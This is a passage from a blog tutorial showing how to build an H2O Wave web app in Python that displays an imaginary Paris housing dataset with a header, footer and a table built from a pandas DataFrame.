Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-displaying-data-with-h2o-wave"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-basic-setup"&gt;The basic setup&lt;/h2&gt;
&lt;p&gt;Whenever I start writing a Wave app I always start with the basic setup which we will use for our web application.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;h2o_wave&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Q, ui, app, main
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/displayData&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;server&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply_layout(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_homepage(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_homepage&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;apply_layout&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first thing we do is import &lt;code&gt;h2o_wave&lt;/code&gt; and define where to listen to the user interface with &lt;code&gt;@app()&lt;/code&gt; (in our code that will be &lt;code&gt;localhost:10101/displayData&lt;/code&gt;). If we now save &lt;code&gt;app.py&lt;/code&gt; and visit &lt;code&gt;localhost:10101/displayData&lt;/code&gt; in a browser we should see a blank web page. If you keep this browser open, every time we save &lt;code&gt;app.py&lt;/code&gt; the browser will update to show the latest additions to our web application.&lt;/p&gt;
&lt;p&gt;We then define a function &lt;code&gt;server()&lt;/code&gt; which will be run every time a user interfaces with &lt;code&gt;localhost:10101/displayData&lt;/code&gt;. Inside &lt;code&gt;server&lt;/code&gt; I always call two functions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;apply_layout()&lt;/code&gt; where we define the layout of the app.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;show_homepage()&lt;/code&gt; which will be the default loading page for the app.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We&amp;rsquo;ll start by creating a basic homepage layout that will only include a header and a footer for now, but we will add to this function as we go. We will then add pages to &lt;code&gt;show_homepage()&lt;/code&gt; to display the header and footer.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;apply_layout&lt;/span&gt;(q:Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;meta&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;meta_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; theme&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;nord&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; layouts&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; breakpoint&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;xl&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;1600px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_homepage&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;header_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;100%&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;86px&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; icon&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Money&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; icon_color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Black&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Paris Housing Market&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;This is an imaginary housing dataset&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;footer_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; caption&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;This dataset was obtained from [Kaggle](https://www.kaggle.com/datasets/mssmartypants/paris-housing-price-prediction)&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In &lt;code&gt;apply_layout()&lt;/code&gt; we add a page, &lt;code&gt;meta&lt;/code&gt;, to create a &lt;code&gt;meta_card&lt;/code&gt; object. We specify a theme for our app using the &lt;code&gt;theme&lt;/code&gt; argument and also define a web app layout using the &lt;code&gt;layouts&lt;/code&gt; argument. The most important part of &lt;code&gt;apply_layout()&lt;/code&gt; is contained within &lt;code&gt;ui.layout()&lt;/code&gt;, which we pass to the &lt;code&gt;layouts&lt;/code&gt; argument. This is where we specify different zones by using &lt;code&gt;ui.zone()&lt;/code&gt;. We define a &lt;code&gt;header&lt;/code&gt; zone for the header and a &lt;code&gt;footer&lt;/code&gt; zone for the footer. Note that a zone can be made up of multiple zones, which we&amp;rsquo;ll see later on.&lt;/p&gt;
&lt;p&gt;In &lt;code&gt;show_homepage()&lt;/code&gt; we add two cards:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;header&lt;/code&gt;. This uses the &lt;code&gt;ui.header_card&lt;/code&gt; to define the header for our app. The &lt;code&gt;icon&lt;/code&gt; argument references &lt;a href="https://uifabricicons.azurewebsites.net/" rel="external"&gt;UI Fabric icons&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;footer&lt;/code&gt;. This uses the &lt;code&gt;ui.footer_card&lt;/code&gt; to define the footer for our app. The &lt;code&gt;caption&lt;/code&gt; argument takes string input but recognises markdown, so you can easily add links like we have here.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Both cards have the argument &lt;code&gt;box&lt;/code&gt;. We use &lt;code&gt;box&lt;/code&gt; here to link the cards with our layout in &lt;code&gt;apply_layout()&lt;/code&gt;. For example, we have a footer zone in our layout function labelled &lt;code&gt;footer&lt;/code&gt;. Setting &lt;code&gt;box = 'footer'&lt;/code&gt; inside &lt;code&gt;ui.footer_card&lt;/code&gt; tells Wave to place the footer card in the zone we defined for it inside &lt;code&gt;apply_layout()&lt;/code&gt;. If we want to be more specific about the box location, we can use the function &lt;code&gt;ui.box&lt;/code&gt; for the &lt;code&gt;box&lt;/code&gt; argument; this is what we do inside &lt;code&gt;ui.header_card&lt;/code&gt;. Here we have specified the width of the box using the &lt;code&gt;width&lt;/code&gt; argument, and the height using the &lt;code&gt;height&lt;/code&gt; argument. Passing &lt;code&gt;width = '100%'&lt;/code&gt; will make the box the width of the app.&lt;/p&gt;
&lt;p&gt;If you save &lt;code&gt;app.py&lt;/code&gt; you should see the web app update in your browser to have a header and footer, like in the image below.&lt;/p&gt;
&lt;p&gt;&lt;img alt="The header and footer of the Wave app displayed in the browser" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/adding_header_and_footer.png" width="1848"&gt;&lt;/p&gt;
&lt;h2 id="adding-a-table"&gt;Adding a table&lt;/h2&gt;
&lt;p&gt;The first thing we&amp;rsquo;ll add to our app is a table to view the raw data. To start we&amp;rsquo;ll need to read in our data with &lt;code&gt;pandas&lt;/code&gt;. We can then create a table with &lt;code&gt;ui.table()&lt;/code&gt;, which we&amp;rsquo;ll wrap in a function called &lt;code&gt;make_table()&lt;/code&gt;, and display it with a function called &lt;code&gt;show_table()&lt;/code&gt;. Note that we will only add the first 100 rows to the table; otherwise the app is slow to load.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#39;ParisHousing.csv&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_table&lt;/span&gt;(df):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;table&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;250px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table_column(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;x, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;x) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table_row(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; str(i),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cells &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(map(str, df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;values&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[i]))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;index[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;:&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_table&lt;/span&gt;(q:Q, df):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Add a title&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;section_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Table of the data&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Add the table&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;table&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;form_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;50%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; items &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [make_table(df)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Sadly, there seems to be no simple way to display a &lt;code&gt;pandas.DataFrame&lt;/code&gt; with H2O Wave, so we have to be a little cunning with how we feed our data frame into &lt;code&gt;ui.table()&lt;/code&gt;. If you look at the &lt;a href="https://wave.h2o.ai/docs/api/ui#table" rel="external"&gt;documentation&lt;/a&gt; for &lt;code&gt;ui.table()&lt;/code&gt;, it expects arguments &lt;code&gt;columns&lt;/code&gt; and &lt;code&gt;rows&lt;/code&gt; with type &lt;code&gt;List[TableColumn]&lt;/code&gt; and &lt;code&gt;List[TableRow]&lt;/code&gt; respectively, so we cannot simply feed the columns and rows of our data frame to &lt;code&gt;columns&lt;/code&gt; and &lt;code&gt;rows&lt;/code&gt;. Instead, we can use list comprehensions to define the columns and rows, which is what we do in &lt;code&gt;make_table()&lt;/code&gt; above. Defining the columns is pretty straightforward: we use &lt;code&gt;ui.table_column()&lt;/code&gt; to define each column and pass in the column name from &lt;code&gt;df.columns.tolist()&lt;/code&gt;. Defining the rows is a little more complicated. We can use the same trick as we did for the columns by using &lt;code&gt;df.values.tolist()&lt;/code&gt; to extract the rows; however, the arguments in &lt;code&gt;ui.table_row()&lt;/code&gt; expect strings, so we need to convert the values passed to &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;cells&lt;/code&gt;. For the list comprehension we simply iterate over the row indices and convert each index to a string using &lt;code&gt;str()&lt;/code&gt;, which we pass to &lt;code&gt;name&lt;/code&gt;. For the &lt;code&gt;cells&lt;/code&gt; we map &lt;code&gt;str()&lt;/code&gt; over the values in &lt;code&gt;df.values.tolist()[i]&lt;/code&gt; and convert the result to a list.&lt;/p&gt;
&lt;p&gt;Now that we&amp;rsquo;ve made our table with &lt;code&gt;make_table()&lt;/code&gt; we can make a function &lt;code&gt;show_table()&lt;/code&gt; to display it in our app. We can use a section card to give a title above the table with &lt;code&gt;ui.section_card()&lt;/code&gt; and add the table by passing it to the &lt;code&gt;items&lt;/code&gt; argument inside a form card. We specify where the card will go by using the &lt;code&gt;box&lt;/code&gt; argument. Here we are using &lt;code&gt;ui.box()&lt;/code&gt; to specify which zone our table is in with &lt;code&gt;'top'&lt;/code&gt; and use the &lt;code&gt;width&lt;/code&gt; argument to specify the desired space for the table. We then need to add these extra zones to &lt;code&gt;apply_layout()&lt;/code&gt;.&lt;/p&gt;
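&lt;p&gt;To see the string conversion in isolation, here is a minimal sketch that runs without pandas or Wave. Plain lists stand in for &lt;code&gt;df.columns.tolist()&lt;/code&gt; and &lt;code&gt;df.values.tolist()&lt;/code&gt;, plain dictionaries stand in for the objects returned by &lt;code&gt;ui.table_column()&lt;/code&gt; and &lt;code&gt;ui.table_row()&lt;/code&gt;, and the values and the helper name &lt;code&gt;to_table_rows()&lt;/code&gt; are made up for illustration.&lt;/p&gt;

```python
# Stand-ins for df.columns.tolist() and df.values.tolist() (made-up values)
columns = ['squareMeters', 'hasYard', 'price']
values = [
    [75523, 0, 7559081.5],
    [80771, 1, 8085989.5],
    [55712, 0, 5574642.1],
]


def to_table_rows(values, limit=100):
    """Build row records whose name and cells are all strings."""
    return [
        {'name': str(i), 'cells': [str(cell) for cell in row]}
        for i, row in enumerate(values[:limit])
    ]


# Dictionaries stand in for ui.table_column() and ui.table_row()
table_columns = [{'name': c, 'label': c} for c in columns]
table_rows = to_table_rows(values)
print(table_rows[1])
```

&lt;p&gt;Slicing once and enumerating the result also avoids calling &lt;code&gt;df.values.tolist()&lt;/code&gt; again for every row, as the comprehension in &lt;code&gt;make_table()&lt;/code&gt; does.&lt;/p&gt;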
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;apply_layout&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;meta&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;meta_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;, theme&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;nord&amp;#39;&lt;/span&gt;, layouts&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; breakpoint&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;xl&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;1600px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;content&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;COLUMN,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
